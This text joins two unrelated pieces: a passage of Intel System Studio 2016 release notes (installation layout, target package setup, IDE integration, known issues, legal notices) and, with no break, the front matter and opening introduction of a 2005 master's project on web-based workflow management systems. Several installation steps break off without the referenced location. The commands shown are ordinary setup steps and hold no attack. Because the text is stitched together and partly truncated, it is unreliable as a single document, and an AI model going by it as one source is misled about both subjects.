Intel® System Studio 2016 installs components which are unique to System Studio into <install-dir>/system_studio_2016.2.xxx/ and components which share subcomponents (such as documentation) with other Intel® Software Development Products into <install-dir>.
The Intel® System Studio 2016 installation directory contains tools and directories as well as links to shared components into the parent directory as follows:
- <install-dir>/system_studio_2016.2.xxx/compiler_libraries -> ../compilers_and_libraries_2016.2.xxx
- <install-dir>/system_studio_2016.2.xxx/debugger
- <install-dir>/system_studio_2016.2.xxx/documentation -> ../documentation_2016
- <install-dir>/system_studio_2016.2.xxx/documentation_2016 -> ../documentation_2016
- <install-dir>/system_studio_2016.2.xxx/ide_support -> ../ide_support_2016
- <install-dir>/system_studio_2016.2.xxx/ide_support_2016 -> ../ide_support_2016
- <install-dir>/system_studio_2016.2.xxx/inspector_for_systems -> ../inspector_2016_for_systems
- <install-dir>/system_studio_2016.2.xxx/licensing
- <install-dir>/system_studio_2016.2.xxx/man -> ../man
- <install-dir>/system_studio_2016.2.xxx/samples -> ../samples_2016
• `<install-dir>/system_studio_2016.2.xxx/samples_2016` -> `../samples_2016`
• `<install-dir>/system_studio_2016.2.xxx/targets`
• `<install-dir>/system_studio_2016.2.xxx/uninstall`
• `<install-dir>/system_studio_2016.2.xxx/uninstall_GUI.sh`
• `<install-dir>/system_studio_2016.2.xxx/uninstall.sh`
• `<install-dir>/system_studio_2016.2.xxx/vtune_amplifier_for_systems_2016.2.x.xxxxxx`
• `<install-dir>/system_studio_2016.2.xxx/wr-iss-2016`
Under the Intel® System Studio 2016 installation directory `<install-dir>` you will find:
• `<install-dir>/bin`
• `<install-dir>/compiler_and_libraries` -> `../compilers_and_libraries_2016`
• `<install-dir>/compiler_and_libraries_2016`
• `<install-dir>/compiler_and_libraries_2016.2.xxx`
• `<install-dir>/debugger_2016`
• `<install-dir>/documentation_2016`
• `<install-dir>/eclipse`
• `<install-dir>/gpa`
• `<install-dir>/ide_support_2016`
• `<install-dir>/include` -> `compilers_and_libraries/linux/include`
• `<install-dir>/inspector_2016_for_systems`
• `<install-dir>/inspector_for_systems` -> `../inspector_2016_for_systems`
• `<install-dir>/ipp` -> `compilers_and_libraries/linux/ipp`
• `<install-dir>/ism`
• `<install-dir>/lib` -> `compilers_and_libraries/linux/lib`
• `<install-dir>/licenses`
• `<install-dir>/man` -> `compilers_and_libraries/linux/man`
• `<install-dir>/mkl` -> `compilers_and_libraries/linux/mkl`
• `<install-dir>/samples_2016`
• `<install-dir>/system_debugger_2016`
• `<install-dir>/system_studio_2016.2.xxx`
• `<install-dir>/tbb` -> `compilers_and_libraries/linux/tbb`
• `<install-dir>/uninstall`
• `<install-dir>/usr`
• `<install-dir>/vtune_amplifier_2016_for_systems` -> `../vtune_amplifier_2016_for_systems.2.x.xxxxxx`
• `<install-dir>/vtune_amplifier_2016_for_systems.2.x.xxxxxx`
• `<install-dir>/vtune_amplifier_for_systems` -> `../vtune_amplifier_2016_for_systems.2.x.xxxxxx`
The Intel® System Studio contains components under GNU* General Public License (GPL) in addition to commercially licensed components. This includes the GNU* Project Debugger (GDB) and the kernel module used by the Intel® System Debugger to dynamically export Linux* kernel module memory load information to the host.
The Intel® VTune™ Amplifier, Intel® Energy Profiler and Intel® Inspector are available for power and performance tuning as well as memory and thread checking on the installation host.
For additional installation of command-line only versions of Intel® VTune™ Amplifier and Intel® Inspector on the development target, please follow the sub-chapter on the command line interface (CLI) installations below.
Furthermore, a targets directory contains Intel® C++ Compiler runtime libraries, the Intel® VTune™ Amplifier Sampling Enabling Product (SEP), target components for the Intel® VTune™ Amplifier Data Collector, the kernel module used by the Intel® System Debugger to dynamically export Linux* kernel module memory load information to the host, and prebuilt gdbserver target debug agents for GDB.
**Sudo or Root Access Right Requirements**
- Integration of the Intel® C++ Compiler into the Yocto Project* Application Development Toolkit requires the launch of the tool suite installation script install.sh as root or sudo user.
- Installation of the hardware drivers for the Intel® ITP-XDP3 probe to be used with the Intel® System Debugger requires the launch of the tool suite installation script install.sh as root or sudo user.
### 8.8 Development target package installation
The targets directory contains Intel® C++ Compiler runtime libraries, the Intel® VTune™ Amplifier Sampling Enabling Product (SEP), target components for the Intel® VTune™ Amplifier Data Collector, target components for the Intel® Inspector, the xdbntf.ko kernel module used by the Intel® System Debugger to export Linux* kernel module memory load information to the host, and prebuilt gdbserver target debug agents for GDB.
To install it follow the steps below
1. Copy the contents of the `<install-dir>/system_studio_2016.2.xxx/targets` directory to your target platform and unpack the `system_studio_target.tgz` and `debugger_kernel_module.tgz` files contained in this directory there.
Add the compiler runtime libraries that you find in .../system_studio_target/compilers_and_libraries_2016.2.175/linux/compiler/lib/<OS> to your target environment search path.
2. For the dynamic kernel module load export feature follow the instructions found at ...
debugger_kernel_module/system_debug/kernel-modules/xdbntf/read.me.
This is also detailed in the Intel® System Debugger Installation Guide and Release Notes sysdebug-release-install.pdf.
3. For the GDB* Debugger remote debug agent gdbserver pick the executable that describes your target system from .../system_studio_target/debugger_2016/gdb/targets/<arch>/<OS>, where arch and OS can be the following:
o arch: ia32
target: Android, CELinuxPR35, ChromiumOS, KendrickCanyon, TizenIVI, WindRiverLinux4, WindRiverLinux5, WindRiverLinux6, WindRiverLinux7, Yocto1.4, Yocto1.5, Yocto1.6, Yocto1.7, Yocto2.0
o arch: intel64
target: Android
o arch: intel64_igfx
target: N/A (graphic offload, debugger for heterogeneous computing)
o arch: Quark
target: Galileo (eglibc, uclibc)
Run gdbserver on the target platform to enable remote application debug.
During the Intel® System Studio product install you can also choose to install the gdbserver sources if support for additional target platforms is needed.
4. For the Intel® VTune Amplifier Sampling Enabling Product (SEP) pick ...
/system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux/vtune_amplifier_target_sep_x86[64].tgz
arch: 32, 64
5. For the Intel® VTune Amplifier for Systems target package pick ...
/system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux/vtune_amplifier_target_x86[64].tgz
arch: 32, 64
6. For WakeUp Watch for Android* follow the instructions at ...
/system_studio_target/wuwatch_android_v3.1.6b /WakeUpWatchForAndroid.pdf
7. For SoC Watch for Android* follow the instructions at ...
/system_studio_target/socwatch_android_vx.x.x/SoCWatchForAndroid_vx_x_x.pdf
8. For SoC Watch for Linux* follow the instructions at
9. For the Intel® Inspector for Systems follow the instructions in
../system_studio_target/inspector_2016_for_systems/
documentation/en/Release_Notes_Inspector_Linux.pdf
8.8.1 Intel® Inspector Command line interface installation
If you would like to install the Intel® Inspector command line interface only for thread checking
and memory checking on a development target device, please follow the steps outlined below:
1. From ../inspector_2016_for_systems/ on the target execute the environment
configuration script inspxe-genvars.sh.
2. Source the script inspxe-vars.sh generated by inspxe-genvars.sh.
3. The fully functional command-line Intel® Inspector installation can be found in the
bin32 and bin64 subdirectories for IA32 and Intel® 64 targets respectively.
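The two setup steps above might be wrapped as follows. This is a sketch only: the script names come from the notes, but the wrapper function is hypothetical and assumes inspxe-genvars.sh writes inspxe-vars.sh into the same directory:

```shell
# setup_inspector_cli: generate and source the Inspector CLI environment
# from the Inspector installation directory on the target.
setup_inspector_cli() {
    dir="$1"
    # Run the generator in its own directory (subshell keeps our cwd).
    ( cd "$dir" && ./inspxe-genvars.sh ) || return 1
    # Source the generated script so the environment applies to this shell.
    . "$dir/inspxe-vars.sh"
}
```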
8.8.2 Preparing a Target Android* System for Remote Analysis
If you would like to install the Intel® VTune™ Amplifier data collectors for power tuning and
performance tuning on an Android* target device, please follow the steps outlined below:
1. You will find SoC Watch at
../system_studio_target/socwatch_android_vx.x.x/
on the target.
o ../system_studio_target/socwatch_android_vx.x.x/
SocWatchForAndroid_vx_x_x.pdf
o The “Preparing a Target Android* System for Remote Analysis” chapter of the
Intel® VTune™ Amplifier User’s Guide.
2. You will find WakeUp Watch at
../system_studio_target/wuwatch_android_v3.1.6b/
on the target.
Please follow the instructions for installation and usage in
o ../system_studio_target/wuwatch_android_v3.1.6b/
WakeUpWatchForAndroid.pdf
o The “Preparing a Target Android* System for Remote Analysis” chapter of the
Intel® VTune™ Amplifier User’s Guide.
8.8.3 Intel® VTune™ Amplifier Collectors Installation on Remote Linux* Systems
If you would like to install the Intel® VTune™ Amplifier data collector for power tuning and performance tuning on a development target device, please follow the steps outlined below:
1. You will find the Intel® VTune™ Amplifier data collectors at
```
../system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux/vtune_amplifier_target_x86[_64].tgz
arch: 32, 64
```
on the target.
2. Data collection on both IA32 and Intel® 64 targets is supported.
3. Follow the instructions in Help document in section “User’s guide->Running analysis remotely” for more details, on how to use this utility.
8.8.4 Intel® VTune™ Amplifier Sampling Enabling Product Installation on Remote Linux* Systems
If you would like to install the Intel® VTune™ Amplifier Sampling Enabling Product (SEP), please follow the steps outlined below:
1. You will find the Intel® VTune Amplifier Sampling Enabling Product at
```
../system_studio_target/vtune_amplifier_2016_update2_for_systems_target/linux<arch>/vtune_amplifier_target_sep_x86[_64].tgz
```
2. After unpacking this zip file follow the instructions in
```
../vtune_amplifier_2016_for_systems.2.x.xxxxxx/sepdk/src/README.txt
```
8.8.5 Intel® Integrated Performance Primitives redistributable shared object installation
If you are using dynamic linking when using the Intel® Integrated Performance Primitives, you will need to copy the relevant Linux* shared objects to the target device along with the application. The redistributable shared objects can be found at
```
<install-dir>/system_studio_2016.2.xxx/compilers_and_libraries_2016/linux/ipp/lib
```
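The copy itself is a plain file transfer. The sketch below stands up placeholder directories with mktemp so the commands are self-contained; on a real setup the source would be the IPP lib directory above and the destination a directory on the target device (for example via scp or a mounted target root filesystem):

```shell
# Placeholder directories for this illustration only. Substitute your actual
# <install-dir>/.../linux/ipp/lib/<arch> and a target location such as
# /mnt/target_rootfs/usr/lib on a real setup.
IPP_LIB_DIR="$(mktemp -d)"
TARGET_LIB_DIR="$(mktemp -d)"
touch "$IPP_LIB_DIR/libippcore.so"   # stand-in for the real redistributables
cp "$IPP_LIB_DIR"/*.so "$TARGET_LIB_DIR/"
```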
8.8.7 Intel® C++ Compiler dynamic runtime library installation
After unpacking system_studio_target.tgz on the target platform you will find the Intel® C++ Compiler runtime libraries at
`./system_studio_target/compilers_and_libraries_2016.2.xxx/linux/compiler/lib/<arch>,`
where `<arch>` is `ia32` or `intel64`.
8.9 Eclipse* IDE Integration
8.9.1 Installation
During System Studio installation you have the option to integrate product components into an existing Eclipse* installation, install the Eclipse* version (v4.5 Mars) that is included in the System Studio package, or skip Eclipse* integration altogether.
If you decide to integrate System Studio tools into your existing Eclipse* installation (usually under `/opt/eclipse`), make sure it meets the following prerequisites:
- Eclipse* IDE for C/C++ Developers, supported versions 3.8/4.2 (Juno) through Eclipse* 4.4 (Luna)
- Java Runtime Environment (JRE) version 6.0 (also called 1.6) update 11 or later.
Note: The Eclipse* integration of the GDB* GNU Project Debugger requires that the Intel® C++ Compiler installation is selected during Intel® System Studio installation as well.
8.9.2 Launching Eclipse for Development with the Intel C++ Compiler
Since Eclipse requires a JRE to execute, you must ensure that an appropriate JRE is available to Eclipse prior to its invocation. You can either add the `bin` folder of the JRE installed on your system to the `PATH` environment variable, or reference the full path of the `java` executable from that JRE in the `-vm` parameter of the Eclipse command, e.g.:
```
eclipse -vm <JRE folder>/bin/java
```
Invoke the Eclipse executable directly from the directory where it has been installed. For example:
```
<eclipse-install-dir>/eclipse/eclipse
```
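For example, the PATH-based option can be sketched as follows (the JRE path below is a hypothetical placeholder; substitute the JRE installed on your system):

```shell
# Hypothetical JRE location; adjust to your system.
JRE_HOME=/opt/jre1.6.0_45
export PATH="$JRE_HOME/bin:$PATH"
# Eclipse will now find java on PATH. Alternatively, pass the executable
# explicitly on the Eclipse command line:
#   <eclipse-install-dir>/eclipse/eclipse -vm "$JRE_HOME/bin/java"
```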
8.9.3 Editing Compiler Cross-Build Environment Files
8.9.4 Cheat Sheets
The Intel® C++ Compiler Eclipse* Integration additionally provides Eclipse*-style cheat sheets on how to set up a project for embedded use cases using the Intel® C++ Compiler.
In the Eclipse* IDE see
Help > Cheat Sheets > Intel® C/C++ Compiler
8.9.5 Integrating the Intel® System Debugger into Eclipse*
Remote debugging with GDB using the Eclipse* IDE requires installation of the C/C++ Development Toolkit (CDT) (http://www.eclipse.org/downloads/packages/eclipse-ide-cc-developers/junosr2) as well as the Remote System Explorer (RSE) plugins (http://download.eclipse.org/tm/downloads). In addition, RSE has to be configured from within Eclipse* to establish a connection with the target hardware.
To add the Intel® System Debugger Eclipse* integration after a full Intel® System Studio installation, or to add the Intel® System Debugger launcher to Wind River* Workbench*, follow these steps from within Eclipse*:
1. Navigate to the “Help > Install New Software” entry in the pulldown menu
2. Select “Add” and “Local” in the following menus …
3. Browse to <ISS_INSTALL_PATH>/debugger/xdb/ide_plugins, where the default for ISS_INSTALL_PATH is /opt/intel/system_studio_2016.1.xxx/
8.10 Wind River* Workbench* IDE Integration
8.10.1 Documentation
1. You will find a detailed README file on the integration particulars of Intel® System Studio in the wr-iss-2016 subdirectory of the Wind River* Workbench* installation directory. This README also goes into the use of the Intel® C++ Compiler as a secondary toolchain layer and adding Intel® System Studio recipes to target platforms for both Wind River* Linux* and Yocto Project*.
2. Additionally there is a Wind River* Workbench integration feature and usage description in the “Using Intel® System Studio with Wind River* Linux* Build Environment” article.
8.10.2 Installation
This is offered automatically as a step in the Intel® System Studio product installation. It also integrates IDE launchers for Intel® VTune™ Amplifier for Systems and the Intel® System Debugger.
As part of the installation the following steps are taken implicitly:
1. Create folder wr-iss-2016 in both the Intel® System Studio installation directory and the Wind River® Workbench® installation directory.
2. In the wr-setup subdirectory, execute the script postinst_wr_iss.sh <install-dir>, providing the Intel® System Studio installation directory as a parameter. This script will register the platform recipes for different Intel® System Studio components and also the IDE integration of Intel® System components such as Intel® C++ Compiler, Intel® VTune™ Amplifier and Intel® System Debugger.
8.10.3 Manual installation
1. Change into the Wind River® Workbench® installation directory and there into the ..wr-iss-2016/wr-setup subdirectory.
2. In the wr-setup subdirectory, execute the script postinst_wr_iss.sh. This script will register the platform recipes for different Intel® System Studio components and also the IDE integration of Intel® System components such as Intel® C++ Compiler, Intel® VTune™ Amplifier and Intel® System Debugger.
8.10.4 Uninstall
1. Change into the Wind River® Workbench® installation directory and there into the ..wr-iss-2016/wr-setup subdirectory.
2. In the wr-setup subdirectory, execute the script uninst_wr_iss.sh.
8.11 Installing Intel® XDP3 JTAG Probe
If the install.sh installation script is executed using root access, su or sudo rights, the required drivers will be installed automatically. Root, su or sudo rights are required for the installation.
8.12 Ordering JTAG Probe for the Intel® System Debugger
1. To order the Intel XDP3 JTAG probe, please go to: http://designintools.intel.com/product_p/itpxdp3brext.htm (ITP-XDP 3BRKit)
2. To order the closed-chassis adapter, please go to:
We will also gladly assist with the ordering process. If you have any questions please submit an issue in the Intel® System Studio product of Intel® Premier Support https://premier.intel.com or send an email to IntelSystemStudio@intel.com.
9 Issues and Limitations
9.1 General Issues and Limitations
For known issues of individual Intel® System Studio components please refer to the individual component release notes. Their location in the installed product can be found in chapter 2: Technical Support and Documentation.
9.1.1 Use non-RPM installation mode with Wind River* Linux* 5 and 6
RPM package access on Wind River* Linux* 5 may be slow and cause the Intel® System Studio installation to take a long time. On a Wind River* Linux* 5 host it is recommended to invoke the installation script in non-RPM mode instead:
$ ./install.sh --INSTALL_MODE NONRPM
or
$ ./install-GUI.sh --INSTALL_MODE NONRPM
9.1.2 Intel® Software Manager unsupported on Wind River* Linux* 5.0, Ubuntu* 12.04.
The Intel® Software Manager is not supported on Wind River* Linux* 5.0 and Ubuntu* 12.04.
9.1.3 Installation into non-default directory on Fedora* 19 may lead to failures
If Intel® System Studio is installed into a folder other than /opt/intel/system_studio_2016.1.xxx/ on Fedora 19, the installation of optional components and of the Python* source for GDB* may fail.
The workaround is to only install default components and deselect the Python* source component of GDB* during install.
Please refer to Bugzilla* report 1001553 entered against RPM tool 4.11 for details.
https://bugzilla.redhat.com/show_bug.cgi?id=1001553
9.1.4 Running online-installer behind proxy server fails
Running the online-installer behind a proxy server produces the error: "Connection to the IRC site cannot be established". Please see the Installation Notes for more details.
9.1.5 The online-installer has to be run with sudo or root access
If the online-installer is run as a regular user the installation will hang in step 6 of the installation. Please see the Installation Notes for more details.
9.1.6 Some hyperlinks in HTML documents may not work when you use Internet Explorer.
Try using another browser, such as Chrome or Firefox, or right-click the link, select Copy shortcut, and paste the link into a new Internet Explorer window.
9.2 Wind River* Linux* 7 Support
9.2.1 Windows* host is currently not supported for Wind River* Linux* 7 targeted development
Windows* host is currently not supported for Wind River* Linux* 7 targeted development
9.2.2 No integration into Wind River* Workbench* IDE is currently available for Wind River* Linux* 7 target
No integration into Wind River* Workbench* IDE is currently available for Wind River* Linux* 7 target
9.2.3 Remote event-based sampling with Intel® VTune™ Amplifier Limitations
When targeting Wind River* Linux* 7 with the Sampling Collector (SEP) for Intel® VTune™ Amplifier for Systems, sampling with callstacks (using vtss.ko) can lead to target freeze-up. The recommendation is not to use callstack sampling when targeting Wind River* Linux* 7 until the next release update.
9.3 Intel® Energy Profiler
9.3.1 /boot/config-`uname -r` file must be present on platform
In order to enable CPU power data collection for Intel® VTune™ Amplifier, please make sure your environment has a file named /boot/config-`uname -r` in the /boot directory.
If there is no such file you should run the following command:
$ cat /proc/config.gz | gunzip - > /boot/config-`uname -r`
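An equivalent, slightly more defensive sketch is shown below. It assumes the kernel exports its configuration via /proc/config.gz (i.e. CONFIG_IKCONFIG_PROC is enabled) and that it is run as root on the target; it is a no-op when the file already exists:

```shell
# Recreate /boot/config-$(uname -r) from the in-kernel config if missing.
CFG="/boot/config-$(uname -r)"
if [ ! -f "$CFG" ] && [ -r /proc/config.gz ]; then
    gunzip -c /proc/config.gz > "$CFG" \
        || echo "could not write $CFG (root required?)"
fi
```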
9.3.2 Power and Frequency Analysis support for Intel® Atom™ Processor covers Android* OS only.
Power and frequency analysis currently requires at least a 2nd generation Intel® Core™ Processor Family based platform or an Intel® Atom™ Processor Z2xxx or Z3xxx running Android* OS
9.4 Intel® VTune™ Amplifier Usage with Yocto Project*
9.4.1 Building Sampling Collector (SEP) for Intel® VTune™ Amplifier driver on host Linux® system
For Yocto Project* targeted development, additional kernel utilities required for building drivers and kernel modules need to be present in the kernel source tree. The following utilities need to be manually added to the standard Yocto Project* 1.x kernel build tree, namely recordmcount, fixdep, and modpost.
9.4.2 Remote Intel® VTune™ Amplifier Sampling on Intel® 64 Yocto Project* Builds
The runtime dynamic linker/loader is installed in a non-standard path on Yocto Project* 1.5 for Intel® 64 (x86_64). For remote sampling with amplxe-runss to work correctly, "/lib64/ld-linux-x86-64.so.2" has to be added as a symlink to /lib/ld-linux-x86-64.so.2 on the target filesystem.
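The symlink can be created as follows. For illustration the sketch works against a scratch directory standing in for the target root filesystem (an assumption for this example); on the real target you would run the ln command against / directly:

```shell
# Scratch directory standing in for the target root filesystem.
TARGET_ROOT="$(mktemp -d)"
mkdir -p "$TARGET_ROOT/lib" "$TARGET_ROOT/lib64"
touch "$TARGET_ROOT/lib/ld-linux-x86-64.so.2"    # stand-in for the loader
# Create the /lib64 symlink pointing at the canonical /lib location.
ln -s /lib/ld-linux-x86-64.so.2 "$TARGET_ROOT/lib64/ld-linux-x86-64.so.2"
```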
9.4.3 Building 64bit Sampling Collector against Yocto Project* targeting Intel® Atom™ Processor E38xx requires additional build flags
Building the Intel® VTune™ Amplifier for Systems Sampling Collector driver SEPDK against the x86_64 version of Yocto Project 1.6 (Daisy) for Intel® Atom™ Processor E38xx requires a modification of the Makefile in ../sepdk/src and ../sepdk/pax.
In both cases the EXTRA_CFLAGS entry needs to be amended with the option
-DCONFIG_COMPAT:
EXTRA_CFLAGS += -I$(LDDINCDIR) -I$(LDDINCDIR1) -DCONFIG_COMPAT
9.5 Intel® System Studio System Analyzer
9.5.1 Supported Linux* Distributions
The Intel® System Studio System Analyzer is currently only supported on Ubuntu.
9.5.2 The path for the Intel® System Studio System Analyzer does not get set up automatically
To launch the Intel® System Studio System Analyzer it is necessary to change into the /opt/intel/usr/bin directory and run the scripts or add this directory to the PATH.
The run scripts for the System Analyzer binaries are located at:
- System Analyzer: /opt/intel/usr/bin/gpa-system-analyzer
- GPA console client: /opt/intel/usr/bin/gpa-console-client
- Platform Analyzer: /opt/intel/usr/bin/gpa-platform-analyzer
- Frame Analyzer for OpenGL: /opt/intel/FrameAnalyzerOGL/FrameAnalyzerOGL.sh
9.5.3 Support for Intel® Atom™ Processor Z3560 and Z3580 code-named “Moorefield” missing
Support for Intel® Atom™ Processor Z3560 and Z3580 code-named “Moorefield” is currently not available.
9.6 Intel® System Debugger
9.6.1 Intel® Puma™ 6 Media Gateway Firmware Recovery Tool not available
The `start_xdb_firmware_recovery.sh / start_xdb_firmware_recovery.bat` utility to allow recovery of corrupted flash memory on the Intel® Puma 6 Media Gateway is not functional in the Intel® System Debugger 2016.
9.6.2 Connecting to Intel® Quark™ SoC may trigger an error message that can be ignored
Establishing a connection with the Intel® System Debugger to an Intel® Quark™ SoC based platform using the ITP-XDP3 device will trigger a console message “MasterFrame.HostApplication Application Error”. The connection will be established, but the target is not stopped. To stop target execution, press "Suspend Execution (Pause)".
9.6.3 Using the symbol browser on large data sets and large symbol info files not recommended
It is recommended to use the source files window to browse to the function to debug instead of the symbol browser as the use of the symbol browser on large data sets and large symbol information files (e.g. Android* kernel image) can lead to debugger stall.
9.6.4 Limited support for Dwarf Version 4 symbol information
If, when debugging binaries generated with GNU* GCC 4.8 or newer, the line information and variable resolution in the debugger is unsatisfactory, please try rebuilding your project using the `-gdwarf-3` option instead of simply `-g`.
9.7 GDB* - GNU* Project Debugger
9.7.1 Eclipse* integration of GDB* requires Intel® C++ Compiler install
The Eclipse* integration of the GDB* GNU Project Debugger requires that the Intel® C++ Compiler installation is selected during Intel® System Studio installation as well.
9.8 Intel® C++ Compiler
9.8.1 “libgcc_s.so.1” should be installed on the target system
By default the Intel® C++ Compiler links the compiled binary with the library “libgcc_s.so.1”. Some embedded device OSs, for example Yocto-1.7, don’t include it by default, so the library should be installed on the target system before running the binary.
10 Attributions
This product includes software developed at:
The Apache Software Foundation (http://www.apache.org/).
Portions of this software were originally based on the following:
- the W3C consortium (http://www.w3c.org).
- the SAX project (http://www.saxproject.org)
- voluntary contributions made by Paul Eng on behalf of the Apache Software Foundation that were originally developed at iClick, Inc., software copyright (c) 1999.
This product includes the updcrc macro by Satchell Evaluations and Chuck Forsberg. Copyright (C) 1986 Stephen Satchell.
This product includes software developed by the MX4J project (http://mx4j.sourceforge.net).
This product includes ICU 1.8.1 and later. Copyright (c) 1995-2006 International Business Machines Corporation and others.
Portions copyright (c) 1997-2007 Cypress Semiconductor Corporation. All rights reserved.
This product includes XORP. Copyright (c) 2001-2004 International Computer Science Institute
This product includes software from the book "Linux Device Drivers" by Alessandro Rubini and Jonathan Corbet, published by O'Reilly & Associates.
This product includes hashtab.c. Bob Jenkins, 1996.
11 Disclaimer and Legal Information
No license (express or implied, by estoppel or otherwise) to any intellectual property rights is granted by this document.
Intel disclaims all express and implied warranties, including without limitation, the implied warranties of merchantability, fitness for a particular purpose, and non-infringement, as well as any warranty arising from course of performance, course of dealing, or usage in trade.
This document contains information on products, services and/or processes in development. All information provided here is subject to change without notice. Contact your Intel representative to obtain the latest forecast, schedule, specifications and roadmaps.
The products and services described may contain defects or errors known as errata which may cause deviations from published specifications. Current characterized errata are available on request.
Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Learn more at Intel.com, or from the OEM or retailer.
Copies of documents which have an order number and are referenced in this document may be obtained by calling 1-800-548-4725 or by visiting www.intel.com/design/literature.htm.
Intel, the Intel logo, Xeon, and Xeon Phi are trademarks of Intel Corporation in the U.S. and/or other countries.
Optimization Notice: Intel's compilers may or may not optimize to the same degree for non-Intel microprocessors for optimizations that are not unique to Intel microprocessors. These optimizations include SSE2, SSE3, and SSSE3 instruction sets and other optimizations. Intel does not guarantee the availability, functionality, or effectiveness of any optimization on microprocessors not manufactured by Intel. Microprocessor-dependent optimizations in this product are intended for use with Intel microprocessors. Certain optimizations not specific to Intel microarchitecture are reserved for Intel microprocessors. Please refer to the applicable product User and Reference Guides for more information regarding the specific instruction sets covered by this notice.
Notice Revision #20110804
*Other names and brands may be claimed as the property of others
© 2016 Intel Corporation.
2005
An End-User Development Approach to Building Customizable Web-Based Document Workflow Management Systems
Stacy Hutchings
AN END-USER DEVELOPMENT APPROACH TO BUILDING CUSTOMIZABLE WEB-BASED DOCUMENT WORKFLOW MANAGEMENT SYSTEMS
by
Stacy Hutchings
A project submitted to the Department of Computer and Information Sciences in partial fulfillment of the requirements for the degree of Master of Science in Computer and Information Sciences
UNIVERSITY OF NORTH FLORIDA
DEPARTMENT OF COMPUTER AND INFORMATION SCIENCES
December, 2005
The project "An End-User Development Approach to Building Customizable Web-Based Document Workflow Management Systems" submitted by Stacy Hutchings in partial fulfillment of the requirements for the degree of Master of Science in Computer and Information Sciences has been approved by the project committee:
Signature Deleted
Arturo Sánchez-Ruiz, Ph.D.
Project Director
Signature Deleted
Judith L. Solano, Ph.D.
Chairperson of the Department
Signature Deleted
Charles N. Winton, Ph.D.
Graduate Director
Date 12/16/05
ACKNOWLEDGEMENT
I would like to thank Dr. Arturo Sánchez-Ruiz for his time and feedback during the implementation of this project. His encouragement and his belief in my work ethic and commitment helped me achieve this important milestone.
I also wish to thank my family and extended family, especially my husband "Hutch," my son Jimi, and my daughter Caitlyn, for their unwavering love and encouragement over the past four years. Without their support, this accomplishment would not have been possible. For the many sacrifices they have made, I am forever grateful.
CONTENTS
List of Figures
Abstract
Chapter 1: Introduction
1.1 The Workflow Reference Model
1.2 Related Work
1.3 System Overview: Our Approach
Chapter 2: System Architecture
2.1 Technologies Used
2.2 Architecture
Chapter 3: Implementation
3.1 Security and Encryption
3.2 User Management
3.3 System Management
3.4 Definition Modes and Versions
3.5 Form Management
3.6 Workflow Management
3.6.1 States
3.6.2 Transitions
3.6.2.1 Assignment Strategies
3.6.2.2 Transition Strategies
3.7 Definition Management
3.7.1 Transition Rules
3.7.2 Form Rules
3.7.3 Rule Definition
3.7.3.1 The Required Validator
3.7.3.2 The Compare Validator
3.7.3.3 The Range Validator
3.8 Task Management
Chapter 4: Conclusions
4.1 Summary
4.2 Future Enhancement Recommendations
References
Appendix A: Database Logical Model
Appendix B: System Demonstration
Vita
FIGURES
Figure 1: The Workflow Reference Model
Figure 2: Architecture Overview
Figure 3: System Implementation
Figure A1: Database Logical Model
Figure B1: The Log In Screen
Figure B2: Register Account Screen
Figure B3: The Standard User View
Figure B4: The Workflow Engineer View
Figure B5: The Administrator View
Figure B6: The Manage User - User Tab
Figure B7: The Manage User - User Groups Tab
Figure B8: The Manage Groups - Group Tab
Figure B9: The Manage Groups - Account Members Tab
Figure B10: The Manage Groups - Group Members Tab
Figure B11: The Manage Systems - System Tab
Figure B12: The Manage Systems - System Processes Tab
Figure B13: The Manage Form Lists - Category Tab
Figure B14: The Manage Form Lists - Item Tab
Figure B15: The Design Form - Form Tab
Figure B16: The Design Form - Pages Tab
Figure B17: The Design Form - Sections Tab
Figure B43: The Manage Systems - System Processes Tab
Figure B44: The Home Page - Select A System Menu
Figure B45: The UNF System - Home Page
Figure B46: The UNF System - View Workflow Queue
Figure B47: The UNF System - View Workflow Queue
Figure B48: The UNF System - Add New Instance
Figure B49: The UNF System - J Hutchings’ Pending Queue
Figure B50: View Instance Details - Summary Tab
Figure B51: View Instance Details - Comments Tab
Figure B52: View Instance Details - Transition Tab
Figure B53: View Instance Details - Reassign Tab
Figure B54: Pending Tasks for Stacy Hutchings
Figure B55: View Instance Details - Comments Tab
Figure B56: View Instance Details - Transition Tab
Figure B57: View Workflow Queue - Closed
Figure B58: View Instance Details - Comments Tab
Figure B59: View Instance Details - Validation Error
Figure B60: View Instance Details - View Only Mode
Figure B61: Pending Tasks for Stacy Hutchings
Figure B62: The UNF System - View Instance Details
Figure B63: Transition Tab: Select Participant
Figure B64: Pending Tasks for Caitlyn Hutchings
Figure B65: View Instance Details - Transition Tab
Figure B66: The UNF System - View Workflow Queue Closed
ABSTRACT
As organizations seek to control their practices through Business Process Management (BPM — or the process of improving the efficiency and effectiveness of an organization through the automation of tasks), workflow management systems (WFMS) have emerged as fundamental supporting software tools. A WFMS must maintain process state while managing the utilization of people and applications (resources), data (context), and constraints (rules) associated with each of the tasks [Baeyens04]. It must also be configurable so it can be easily adapted to manage specific workflows within any application domain. Finally, the WFMS should be flexible enough to allow for changing business needs. In order to meet these challenges, a WFMS must provide access to process and document definition tools as well as administrative tools.
In this project we have used an “End User Development” (EUD) approach [Repenning04] to build a stand-alone web-based WFMS which offers the non-technical end user the ability to design, launch, and manage multiple automated
workflows and their associated documents. It empowers end users to build and customize their own systems without requiring from them skills other than those associated with their domain of expertise.
Chapter 1
INTRODUCTION
The benefits of automating workflow are often the selling points of a WFMS. Many commercial WFMS websites document the following benefits: it can reduce the amount of paper, the amount of administrative work, errors, cost, and time, and, through process monitoring tools, it can prove its own efficiency. Numerous case studies support the finding that businesses gain many improvements through the use of automated workflows. This section begins with a discussion of the Workflow Reference Model, which delineates the essential components of a WFMS. A section reviewing related work follows, revealing how our approach differs from others documented in the current literature. Finally, the last section gives an overview of the system we built, highlighting its contributions.
1.1 The Workflow Reference Model
The Workflow Management Coalition (WfMC) was established in 1993 to address the "computerized facilitation or automation of a business process, in whole or in part" [WfMC]. A business process, manual or automated, can be defined as a series of tasks that are performed by a person, persons, or applications in order to achieve an overall goal. Rules accompany the process by governing such things as the order in which the tasks are performed, as well as the amount and type of information presented and exchanged at each step. Each task should be defined in enough detail to determine the who, the what, the when, and the how of the process detail. It is important to know at each step who is responsible for the task, what information needs to be collected, and when the task should occur. In addition, privileges and constraints control how it should occur (this includes determining the next step(s) as defined by the network of tasks).
